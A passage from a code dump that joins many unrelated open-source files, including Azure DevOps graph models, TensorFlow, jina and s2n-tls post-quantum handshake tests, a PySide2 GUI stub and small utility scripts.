principal_name=principal_name) self.directory_alias = directory_alias self.is_deleted_in_origin = is_deleted_in_origin self.metadata_update_date = metadata_update_date self.meta_type = meta_type class GraphGroup(GraphMember): """ Graph group entity :param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject. :type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>` :param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations. :type descriptor: str :param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider. :type display_name: str :param url: This url is the full route to the source resource of this graph subject. :type url: str :param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor. :type legacy_descriptor: str :param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA) :type origin: str :param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is not backed by a different provider and has a different unique id in the new provider. :type origin_id: str :param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User). :type subject_kind: str :param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AD the name of the domain, for AAD the tenantID of the directory, for VSTS groups the ScopeId, etc) :type domain: str :param mail_address: The email address of record for a given graph member. This may be different than the principal name. :type mail_address: str :param principal_name: This is the PrincipalName of this graph member from the source provider. The source provider may change this field over time and it is not guaranteed to be immutable for the life of the graph member by VSTS. :type principal_name: str :param description: A short phrase to help human readers disambiguate groups with similar names :type description: str :param is_cross_project: :type is_cross_project: bool :param is_deleted: :type is_deleted: bool :param is_global_scope: :type is_global_scope: bool :param is_restricted_visible: :type is_restricted_visible: bool :param local_scope_id: :type local_scope_id: str :param scope_id: :type scope_id: str :param scope_name: :type scope_name: str :param scope_type: :type scope_type: str :param securing_host_id: :type securing_host_id: str :param special_type: :type special_type: str """ _attribute_map = { '_links': {'key': '_links', 'type': 'ReferenceLinks'}, 'descriptor': {'key': 'descriptor', 'type': 'str'}, 'display_name': {'key': 'displayName', 'type': 'str'}, 'url': {'key': 'url', 'type': 'str'}, 'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'}, 'origin': {'key': 'origin', 'type': 'str'}, 'origin_id': {'key': 'originId', 'type': 'str'}, 'subject_kind': {'key': 'subjectKind', 'type': 'str'}, 'domain': {'key': 'domain', 'type': 'str'}, 'mail_address': {'key': 'mailAddress', 'type': 'str'}, 'principal_name': {'key': 'principalName', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'is_cross_project': {'key': 'isCrossProject', 'type': 'bool'}, 'is_deleted': {'key': 'isDeleted', 'type': 'bool'}, 'is_global_scope': {'key': 'isGlobalScope', 'type': 'bool'}, 'is_restricted_visible': {'key': 'isRestrictedVisible', 'type': 'bool'}, 'local_scope_id': {'key': 'localScopeId', 'type': 'str'}, 'scope_id': {'key': 'scopeId', 'type': 'str'}, 'scope_name': {'key': 'scopeName', 'type': 'str'}, 'scope_type': {'key': 'scopeType', 'type': 'str'}, 'securing_host_id': {'key': 'securingHostId', 'type': 'str'}, 'special_type': {'key': 'specialType', 'type': 'str'} } def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None, domain=None, mail_address=None, principal_name=None, description=None, is_cross_project=None, is_deleted=None, is_global_scope=None, is_restricted_visible=None, local_scope_id=None, scope_id=None, scope_name=None, scope_type=None, securing_host_id=None, special_type=None): super(GraphGroup, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url, legacy_descriptor=legacy_descriptor, origin=origin, origin_id=origin_id, subject_kind=subject_kind, domain=domain, mail_address=mail_address, principal_name=principal_name) self.description = description self.is_cross_project = is_cross_project self.is_deleted = is_deleted self.is_global_scope = is_global_scope self.is_restricted_visible = is_restricted_visible self.local_scope_id = local_scope_id self.scope_id = scope_id self.scope_name = scope_name self.scope_type = scope_type self.securing_host_id = securing_host_id self.special_type = special_type __all__ = [ 'Avatar', 'GraphCachePolicies', 'GraphDescriptorResult', 'GraphFederatedProviderData', 'GraphGroupCreationContext', 'GraphMembership', 'GraphMembershipState', 'GraphMembershipTraversal', 'GraphProviderInfo', 'GraphScopeCreationContext', 'GraphStorageKeyResult', 'GraphSubjectBase', 'GraphSubjectLookup', 'GraphSubjectLookupKey', 'GraphUserCreationContext', 'GraphUserUpdateContext', 'JsonPatchOperation', 'PagedGraphGroups', 'PagedGraphUsers', 'ReferenceLinks', 'GraphSubject', 'GraphMember', 'GraphScope', 'GraphUser', 'GraphGroup', ]
official/vision/beta/projects/yolo/modeling/heads/yolo_head_test.py
NasTul/models
82,518
12635031
<gh_stars>1000+ # Copyright 2021 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Lint as: python3 """Tests for yolo heads.""" # Import libraries from absl.testing import parameterized import tensorflow as tf from official.vision.beta.projects.yolo.modeling.heads import yolo_head as heads class YoloDecoderTest(parameterized.TestCase, tf.test.TestCase): def test_network_creation(self): """Test creation of YOLO family models.""" tf.keras.backend.set_image_data_format('channels_last') input_shape = { '3': [1, 52, 52, 256], '4': [1, 26, 26, 512], '5': [1, 13, 13, 1024] } classes = 100 bps = 3 head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps) inputs = {} for key in input_shape: inputs[key] = tf.ones(input_shape[key], dtype=tf.float32) endpoints = head(inputs) # print(endpoints) for key in endpoints.keys(): expected_input_shape = input_shape[key] expected_input_shape[-1] = (classes + 5) * bps self.assertAllEqual(endpoints[key].shape.as_list(), expected_input_shape) def test_serialize_deserialize(self): # Create a network object that sets all of its config options. tf.keras.backend.set_image_data_format('channels_last') input_shape = { '3': [1, 52, 52, 256], '4': [1, 26, 26, 512], '5': [1, 13, 13, 1024] } classes = 100 bps = 3 head = heads.YoloHead(3, 5, classes=classes, boxes_per_level=bps) inputs = {} for key in input_shape: inputs[key] = tf.ones(input_shape[key], dtype=tf.float32) _ = head(inputs) configs = head.get_config() head_from_config = heads.YoloHead.from_config(configs) self.assertAllEqual(head.get_config(), head_from_config.get_config()) if __name__ == '__main__': tf.test.main()
tests/unit/test_is_decompressed_message.py
vishalbelsare/jina
15,179
12635033
<gh_stars>1000+ import time from jina.helper import random_identity from jina.logging.predefined import default_logger from jina.parsers import set_pea_parser from jina.peapods.runtimes.zmq.zed import ZEDRuntime from jina.peapods.peas import BasePea from jina.peapods.zmq import Zmqlet from jina.types.message import Message from jina.types.request import Request from jina import Executor, requests from tests import validate_callback class DecompressExec(Executor): @requests() def func(self, docs, **kwargs): for doc in docs: doc.text = 'used' class MockRuntimeNotDecompressed(ZEDRuntime): def _post_hook(self, msg: 'Message'): super()._post_hook(msg) if msg is not None: decompressed = msg.request.is_decompressed if msg.is_data_request: assert not decompressed return msg class MockRuntimeDecompressed(ZEDRuntime): def _post_hook(self, msg: 'Message'): super()._post_hook(msg) if msg is not None: decompressed = msg.request.is_decompressed if msg.is_data_request: assert decompressed return msg class MockPea(BasePea): def _get_runtime_cls(self): if self.args.runtime_cls == 'MockRuntimeNotDecompressed': return MockRuntimeNotDecompressed else: return MockRuntimeDecompressed args1 = set_pea_parser().parse_args( [ '--host-in', '0.0.0.0', '--host-out', '0.0.0.0', '--socket-in', 'PULL_CONNECT', '--socket-out', 'PUSH_CONNECT', ] ) args2 = set_pea_parser().parse_args( [ '--host-in', '0.0.0.0', '--host-out', '0.0.0.0', '--port-in', str(args1.port_out), '--port-out', str(args1.port_in), '--socket-in', 'PULL_BIND', '--socket-out', 'PUSH_BIND', '--runtime-cls', 'MockRuntimeNotDecompressed', ] ) args3 = set_pea_parser().parse_args( [ '--host-in', '0.0.0.0', '--host-out', '0.0.0.0', '--port-in', str(args1.port_out), '--port-out', str(args1.port_in), '--socket-in', 'PULL_BIND', '--socket-out', 'PUSH_BIND', '--uses', 'DecompressExec', '--runtime-cls', 'MockRuntimeDecompressed', ] ) def test_not_decompressed_zmqlet(mocker): with MockPea(args2) as pea, Zmqlet(args1, default_logger) as z: req = Request() req.request_id = random_identity() d = req.data.docs.add() d.tags['id'] = 2 msg = Message(None, req, 'tmp', '') mock = mocker.Mock() z.send_message(msg) time.sleep(1) z.recv_message(mock) def callback(msg_): pass validate_callback(mock, callback) print(f' joining pea') pea.join() print(f' joined pea') def test_decompressed_zmqlet(mocker): with MockPea(args3) as pea, Zmqlet(args1, default_logger) as z: req = Request() req.request_id = random_identity() d = req.data.docs.add() d.tags['id'] = 2 msg = Message(None, req, 'tmp', '') mock = mocker.Mock() z.send_message(msg) time.sleep(1) z.recv_message(mock) def callback(msg_): pass validate_callback(mock, callback) print(f' joining pea') pea.join() print(f' joined pea') def test_recv_message_zmqlet(mocker): zmqlet1 = Zmqlet(args1, default_logger) zmqlet2 = Zmqlet(args2, default_logger) req = Request() req.request_id = random_identity() doc = req.data.docs.add() doc.tags['id'] = 2 msg = Message(None, req, 'tmp', '') def callback(msg_): assert msg_.request.docs[0].tags['id'] == msg.request.data.docs[0].tags['id'] mock = mocker.Mock() zmqlet1.send_message(msg) time.sleep(1) zmqlet2.recv_message(mock) validate_callback(mock, callback)
pkg/win32/Python27/Lib/site-packages/klei/imgutil.py
hexgear-studio/ds_mod_tools
112
12635034
from PIL import Image, ImageOps def Expand( im, border_size ): new_img = ImageOps.expand( im, border = border_size ) for i in range( border_size ): left = border_size - i right = border_size + im.size[0] + i top = border_size - i bottom = border_size + im.size[1] + i - 1 top_line = new_img.crop( ( left, top, right, top + 1 ) ) bottom_line = new_img.crop( ( left, bottom, right, bottom + 1 ) ) new_img.paste( top_line, ( left, top - 1, right, top ) ) new_img.paste( bottom_line, ( left, bottom + 1, right, bottom + 2 ) ) left_line = new_img.crop( ( left, top - 1, left + 1, bottom + 2 ) ) right_line = new_img.crop( ( right-1, top - 1, right, bottom + 2 ) ) new_img.paste( left_line, ( left - 1, top - 1, left, bottom + 2 ) ) new_img.paste( right_line, ( right, top - 1, right + 1, bottom + 2 ) ) return new_img def OpenImage( filename, size=None, border_size = 0 ): im = Image.open( filename ) if size != None: im = im.resize( size, Image.ANTIALIAS ) im = Expand( im, border_size ) return im
tests/collisions/apps.py
KazakovDenis/django-extensions
4,057
12635061
<filename>tests/collisions/apps.py # -*- coding: utf-8 -*- from django.apps import AppConfig class FooConfig(AppConfig): name = 'tests.collisions' app_label = 'collisions'
zhihu_user_info_spider/data_analysis/test/pandas_test.py
Yourrrrlove/spider_collection
178
12635065
<filename>zhihu_user_info_spider/data_analysis/test/pandas_test.py import pandas as pd import numpy as np df = pd.read_csv( r"D:\pycharm\PyCharm 2020.1.1\workplace\zhihu_user_info\zhihu_user_info_spider\result\userInfo\2021\10\17\user_info_low_cleaned.csv") df1 = df.drop_duplicates(subset="id") print(df1.groupby("所在行业").size()) # print(df1.pivot_table) # print(df1["id"].value_counts())
src/GridCal/Gui/GIS/gui.py
mzy2240/GridCal
284
12635069
<gh_stars>100-1000 # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'gui.ui', # licensing of 'gui.ui' applies. # # Created: Mon Dec 9 12:39:51 2019 # by: pyside2-uic running on PySide2 5.13.0 # # WARNING! All changes made in this file will be lost! from PySide2 import QtCore, QtGui, QtWidgets class Ui_GisWindow(object): def setupUi(self, GisWindow): GisWindow.setObjectName("GisWindow") GisWindow.resize(938, 577) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap(":/icons/icons/map.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) GisWindow.setWindowIcon(icon) self.centralwidget = QtWidgets.QWidget(GisWindow) self.centralwidget.setObjectName("centralwidget") self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget) self.verticalLayout.setObjectName("verticalLayout") self.webFrame = QtWidgets.QFrame(self.centralwidget) self.webFrame.setFrameShape(QtWidgets.QFrame.StyledPanel) self.webFrame.setFrameShadow(QtWidgets.QFrame.Raised) self.webFrame.setObjectName("webFrame") self.verticalLayout.addWidget(self.webFrame) GisWindow.setCentralWidget(self.centralwidget) self.statusbar = QtWidgets.QStatusBar(GisWindow) self.statusbar.setObjectName("statusbar") GisWindow.setStatusBar(self.statusbar) self.toolBar = QtWidgets.QToolBar(GisWindow) self.toolBar.setMovable(False) self.toolBar.setFloatable(False) self.toolBar.setObjectName("toolBar") GisWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar) self.actionSave_map = QtWidgets.QAction(GisWindow) icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap(":/icons/icons/savec.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.actionSave_map.setIcon(icon1) self.actionSave_map.setObjectName("actionSave_map") self.toolBar.addAction(self.actionSave_map) self.retranslateUi(GisWindow) QtCore.QMetaObject.connectSlotsByName(GisWindow) def retranslateUi(self, GisWindow): GisWindow.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "GridCal - GIS", None, -1)) self.toolBar.setWindowTitle(QtWidgets.QApplication.translate("GisWindow", "toolBar", None, -1)) self.actionSave_map.setText(QtWidgets.QApplication.translate("GisWindow", "Save map", None, -1)) self.actionSave_map.setToolTip(QtWidgets.QApplication.translate("GisWindow", "Save this map", None, -1)) self.actionSave_map.setShortcut(QtWidgets.QApplication.translate("GisWindow", "Ctrl+S", None, -1)) from .icons_rc import * if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) GisWindow = QtWidgets.QMainWindow() ui = Ui_GisWindow() ui.setupUi(GisWindow) GisWindow.show() sys.exit(app.exec_())
tests/integrationv2/test_pq_handshake.py
hongxu-jia/s2n-tls
4,256
12635078
<gh_stars>1000+ import pytest import os from configuration import available_ports, PROVIDERS, PROTOCOLS from common import Ciphers, ProviderOptions, Protocols, data_bytes, KemGroups, Certificates, pq_enabled from fixtures import managed_process from providers import Provider, S2N, OpenSSL from utils import invalid_test_parameters, get_parameter_name, to_bytes CIPHERS = [ None, # `None` will default to the appropriate `test_all` cipher preference in the S2N client provider Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_TLS_1_0_2018_10, Ciphers.PQ_TLS_1_0_2020_12, ] KEM_GROUPS = [ KemGroups.P256_KYBER512R2, KemGroups.P256_BIKE1L1FOR2, KemGroups.P256_SIKEP434R3, ] EXPECTED_RESULTS = { # The tuple keys have the form (client_{cipher, kem_group}, server_{cipher, kem_group}) (Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r1-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384", "kem": "BIKE1r2-Level1", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp503r1-KEM", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"}, (Ciphers.PQ_SIKE_TEST_TLS_1_0_2020_02, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384", "kem": "SIKEp434r3-KEM", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2019_06, Ciphers.KMS_TLS_1_0_2018_10): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_02, Ciphers.KMS_TLS_1_0_2018_10): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.KMS_TLS_1_0_2018_10): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, (Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2019_06): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, (Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_02): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, (Ciphers.KMS_TLS_1_0_2018_10, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-RSA-AES256-GCM-SHA384", "kem": "NONE", "kem_group": "NONE"}, # The expected kem_group string for this case purposefully excludes a curve; # depending on how s2n was compiled, the curve may be either x25519 or p256. (Ciphers.PQ_TLS_1_0_2020_12, Ciphers.PQ_TLS_1_0_2020_12): {"cipher": "TLS_AES_256_GCM_SHA384", "kem": "NONE", "kem_group": "_kyber-512-r2"}, (Ciphers.PQ_TLS_1_0_2020_12, Ciphers.KMS_PQ_TLS_1_0_2020_07): {"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"}, (Ciphers.KMS_PQ_TLS_1_0_2020_07, Ciphers.PQ_TLS_1_0_2020_12): {"cipher": "ECDHE-KYBER-RSA-AES256-GCM-SHA384", "kem": "kyber512r2", "kem_group": "NONE"}, (Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_KYBER512R2): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"}, (Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_BIKE1L1FOR2): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"}, (Ciphers.PQ_TLS_1_0_2020_12, KemGroups.P256_SIKEP434R3): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"}, (KemGroups.P256_KYBER512R2, Ciphers.PQ_TLS_1_0_2020_12): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_kyber-512-r2"}, (KemGroups.P256_BIKE1L1FOR2, Ciphers.PQ_TLS_1_0_2020_12): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_bike-1l1fo-r2"}, (KemGroups.P256_SIKEP434R3, Ciphers.PQ_TLS_1_0_2020_12): {"cipher": "AES256_GCM_SHA384", "kem": "NONE", "kem_group": "secp256r1_sike-p434-r3"}, } """ Similar to invalid_test_parameters(), this validates the test parameters for both client and server. Returns True if the test case using these parameters should be skipped. """ def invalid_pq_handshake_test_parameters(*args, **kwargs): client_cipher_kwargs = kwargs.copy() client_cipher_kwargs["cipher"] = kwargs["client_cipher"] server_cipher_kwargs = kwargs.copy() server_cipher_kwargs["cipher"] = kwargs["server_cipher"] # `or` is correct: invalid_test_parameters() returns True if the parameters are invalid; # we want to return True here if either of the sets of parameters are invalid. return invalid_test_parameters(*args, **client_cipher_kwargs) or invalid_test_parameters(*args, **server_cipher_kwargs) def get_oqs_openssl_override_env_vars(): oqs_openssl_install_dir = os.environ["OQS_OPENSSL_1_1_1_INSTALL_DIR"] override_env_vars = dict() override_env_vars["PATH"] = oqs_openssl_install_dir + "/bin" override_env_vars["LD_LIBRARY_PATH"] = oqs_openssl_install_dir + "/lib" return override_env_vars def assert_s2n_negotiation_parameters(s2n_results, expected_result): if expected_result is not None: assert to_bytes(("Cipher negotiated: " + expected_result['cipher'])) in s2n_results.stdout assert to_bytes(("KEM: " + expected_result['kem'])) in s2n_results.stdout # Purposefully leave off the "KEM Group: " prefix in order to perform partial matches # without specifying the curve. assert to_bytes(expected_result['kem_group']) in s2n_results.stdout @pytest.mark.uncollect_if(func=invalid_pq_handshake_test_parameters) @pytest.mark.parametrize("protocol", [Protocols.TLS12, Protocols.TLS13], ids=get_parameter_name) @pytest.mark.parametrize("client_cipher", CIPHERS, ids=get_parameter_name) @pytest.mark.parametrize("server_cipher", CIPHERS, ids=get_parameter_name) def test_s2nc_to_s2nd_pq_handshake(managed_process, protocol, client_cipher, server_cipher): port = next(available_ports) client_options = ProviderOptions( mode=Provider.ClientMode, port=port, insecure=True, cipher=client_cipher, protocol=protocol) server_options = ProviderOptions( mode=Provider.ServerMode, port=port, protocol=protocol, cipher=server_cipher, cert=Certificates.RSA_4096_SHA512.cert, key=Certificates.RSA_4096_SHA512.key) server = managed_process(S2N, server_options, timeout=5) client = managed_process(S2N, client_options, timeout=5) if pq_enabled(): expected_result = EXPECTED_RESULTS.get((client_cipher, server_cipher), None) else: # If PQ is not enabled in s2n, we expect classic handshakes to be negotiated. # Leave the expected cipher blank, as there are multiple possibilities - the # important thing is that kem and kem_group are NONE. expected_result = {"cipher": "", "kem": "NONE", "kem_group": "NONE"} # Client and server are both s2n; can make meaningful assertions about negotiation for both for results in client.get_results(): results.assert_success() assert_s2n_negotiation_parameters(results, expected_result) for results in server.get_results(): results.assert_success() assert_s2n_negotiation_parameters(results, expected_result) @pytest.mark.uncollect_if(func=invalid_test_parameters) @pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name) @pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name) @pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name) def test_s2nc_to_oqs_openssl_pq_handshake(managed_process, protocol, cipher, kem_group): # If PQ is not enabled in s2n, there is no reason to test against oqs_openssl if not pq_enabled(): return port = next(available_ports) client_options = ProviderOptions( mode=Provider.ClientMode, port=port, insecure=True, cipher=cipher, protocol=protocol) server_options = ProviderOptions( mode=Provider.ServerMode, port=port, protocol=protocol, cert=Certificates.RSA_4096_SHA512.cert, key=Certificates.RSA_4096_SHA512.key, env_overrides=get_oqs_openssl_override_env_vars(), extra_flags=['-groups', kem_group.oqs_name]) server = managed_process(OpenSSL, server_options, timeout=5) client = managed_process(S2N, client_options, timeout=5) expected_result = EXPECTED_RESULTS.get((cipher, kem_group), None) for results in client.get_results(): # Client is s2n; can make meaningful assertions about negotiation results.assert_success() assert_s2n_negotiation_parameters(results, expected_result) for results in server.get_results(): # Server is OQS OpenSSL; just ensure the process exited successfully results.assert_success() @pytest.mark.uncollect_if(func=invalid_test_parameters) @pytest.mark.parametrize("protocol", [Protocols.TLS13], ids=get_parameter_name) @pytest.mark.parametrize("cipher", [Ciphers.PQ_TLS_1_0_2020_12], ids=get_parameter_name) @pytest.mark.parametrize("kem_group", KEM_GROUPS, ids=get_parameter_name) def test_oqs_openssl_to_s2nd_pq_handshake(managed_process, protocol, cipher, kem_group): # If PQ is not enabled in s2n, there is no reason to test against oqs_openssl if not pq_enabled(): return port = next(available_ports) client_options = ProviderOptions( mode=Provider.ClientMode, port=port, protocol=protocol, env_overrides=get_oqs_openssl_override_env_vars(), extra_flags=['-groups', kem_group.oqs_name]) server_options = ProviderOptions( mode=Provider.ServerMode, port=port, protocol=protocol, cipher=cipher, cert=Certificates.RSA_4096_SHA512.cert, key=Certificates.RSA_4096_SHA512.key) server = managed_process(S2N, server_options, timeout=5) client = managed_process(OpenSSL, client_options, timeout=5) expected_result = EXPECTED_RESULTS.get((kem_group, cipher), None) for results in client.get_results(): # Client is OQS OpenSSL; just ensure the process exited successfully results.assert_success() for results in server.get_results(): # Server is s2n; can make meaningful assertions about negotiation results.assert_success() assert_s2n_negotiation_parameters(results, expected_result)
configs/models/aotl.py
yoxu515/aot-benchmark
105
12635081
<reponame>yoxu515/aot-benchmark<filename>configs/models/aotl.py import os from .default import DefaultModelConfig class ModelConfig(DefaultModelConfig): def __init__(self): super().__init__() self.MODEL_NAME = 'AOTL' self.MODEL_LSTT_NUM = 3 self.TRAIN_LONG_TERM_MEM_GAP = 2 self.TEST_LONG_TERM_MEM_GAP = 5
02_advanced/02_debugging/ex_01_compute_test_value.py
johny-c/theano_exercises
711
12635083
# Run # python 01_compute_test_value.py # It should raise an exception when it tries to execute the call to fn. # The exception doesn't make it easy to tell which line of the python script # first created an invalid expression though. # Modify the script to use compute_test_value to find the first bad line. import numpy as np from theano import function from theano import tensor as T a = T.vector() b = T.log(a) c = T.nnet.sigmoid(b) d = T.sqrt(c) e = T.concatenate((d, c), axis=0) f = b * c * d g = e + f h = g / c fn = function([a], h) fn(np.ones((3,)).astype(a.dtype)) print "SUCCESS!"
test/swig/nnScalarOperators.py
AyishaR/deepC
223
12635116
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, unused-argument # # This file is part of DNN compiler maintained at # https://github.com/ai-techsystems/dnnCompiler import common; # DNNC path setup import deepC.dnnc as dc import numpy as np import unittest, random, math def temp_softsign(x): return (x / (1 + np.abs(x))); def temp_erf(x): y = np.vectorize(math.erf)(x).astype(np.float32) return y class nnScalarOperatorsTest(unittest.TestCase): def setUp(self): self.random_number1 = random.randrange(20, 50, 3) self.random_number2 = random.randrange(200, 500, 1) self.random_number3 = random.randrange(10, 500, 2) # self.np_a = np.array(self.random_number1).astype(np.float32) # self.np_b = np.array(self.random_number2).astype(np.float32) # self.dc_a = dc.array([self.random_number1]) # self.dc_b = dc.array([self.random_number2]) self.np_a = self.random_number1 self.np_b = self.random_number2 self.dc_a = self.random_number1 self.dc_b = self.random_number2 def test_nnScalar_asin (self): np.testing.assert_allclose(np.arcsin(1), dc.asin(1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arcsin(0), dc.asin(0), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arcsin(-1), dc.asin(-1), rtol=1e-3, atol=1e-3) def test_nnScalar_acos (self): np.testing.assert_allclose(np.arccos(1), dc.acos(1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arccos(0), dc.acos(0), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arccos(-1), dc.acos(-1), rtol=1e-3, atol=1e-3) def test_nnScalar_atan (self): np.testing.assert_allclose(np.arctan(self.random_number1), dc.atan(self.random_number1), rtol=1e-3, atol=1e-3) np.testing.assert_allclose(np.arctan(self.random_number2), dc.atan(self.random_number2), 